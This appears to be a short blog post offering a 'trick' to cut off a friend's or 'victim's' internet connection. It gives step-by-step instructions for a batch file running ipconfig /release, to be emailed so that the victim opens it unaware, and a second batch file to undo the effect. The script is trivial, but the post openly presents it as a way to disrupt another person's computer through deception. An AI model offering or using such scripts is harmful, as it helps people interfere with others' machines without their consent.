Hey guys here's a simple trick to disable internet connection of ur friend's computer/ victim :-
Step 1 : open notepad in your pc
Step 2 : write below script
@echo off
Ipconfig/release
Step 3 : save this file as disable.bat
Step 4 : now send this file to victim by email or etc. If he open this file their internet will blocked
Step 5 : now how to enable this disable network
Step 6 : open notepad write script
@echo off
Ipconfig / renew
Step 7 : save this file as name enable.bat
Step 8 : send it to victim for enable internet
Step 9 : if he open their internet will enable
Step 10 : open .Bat file as *run as administration*
Enjoy guys :)
0 comments:
Post a Comment